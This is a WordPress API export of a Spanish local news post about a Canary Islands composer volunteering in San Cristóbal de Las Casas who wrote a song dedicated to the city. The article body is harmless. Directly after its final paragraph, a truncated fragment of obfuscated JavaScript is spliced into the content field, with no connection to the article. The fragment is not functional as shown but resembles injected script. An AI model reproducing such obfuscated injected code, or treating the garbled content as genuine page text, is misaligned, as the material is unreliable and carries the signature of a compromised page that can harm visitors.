{"id":7330,"date":"2022-12-15T01:28:06","date_gmt":"2022-12-15T01:28:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7330"},"modified":"2022-12-15T01:28:06","modified_gmt":"2022-12-15T01:28:06","slug":"componen-cancion-dedicada-a-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7330","title":{"rendered":"Componen canci\u00f3n dedicada a San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40-1024x768.jpeg\" alt=\"\" class=\"wp-image-7331\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.03.40.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Como un recuerdo y agradecimiento a la ciudad, Claudia \u00c1lamo, de Las Islas Canarias, compositora y maestra voluntaria de la organizaci\u00f3n no gubernamental Viva, escribi\u00f3 una canci\u00f3n dedicada a San Crist\u00f3bal de Las Casas, que ser\u00e1 dada a conocer pr\u00f3ximamente en redes sociales. En entrevista, coment\u00f3 que en este momento se encuentran en el proceso de producci\u00f3n del videoclip y espera que en conjunto con Jorge G\u00f3mez quede listo a finales de mes, &#8220;es una idea que vengo haciendo en mi segunda estancia en la ciudad, el a\u00f1o pasado conoc\u00ed la ciudad y me cur\u00f3 de alguna manera, en esa estancia disfrut\u00e9 mucho a la ciudad y ahora que volv\u00ed compuse una canci\u00f3n&#8221;. &#8220;Tengo varias composiciones, gracias a que he estado en varios lugares y en el caso de San Crist\u00f3bal me he dado el tiempo para escribir y ahora mismo estamos con otra canci\u00f3n que se llama Ley de Usos y Costumbres, la que vamos a presentar de llama San Crist\u00f3bal, no pod\u00eda nombrarla de otra manera&#8221;. Asimismo, dijo que la composici\u00f3n se dar\u00e1 a conocer en redes sociales en la cuenta Claudia \u00c1lamo, &#8220;ahora mismo estoy viviendo aqu\u00ed, llevo dos meses, vine a trabajar como voluntaria, nos encontramos editando unas im\u00e1genes y esperamos tener todo listo a finales de a\u00f1o&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Como un recuerdo y agradecimiento a la ciudad, Claudia \u00c1lamo, de Las Islas Canarias, compositora y maestra voluntaria de la organizaci\u00f3n no gubernamental Viva, escribi\u00f3 una canci\u00f3n dedicada a San Crist\u00f3bal de Las Casas, que ser\u00e1 dada a conocer pr\u00f3ximamente en redes sociales. En entrevista, coment\u00f3 que en este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7331,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7330","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7330"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7330\/revisions"}],"predecessor-version":[{"id":7332,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7330\/revisions\/7332"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7331"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}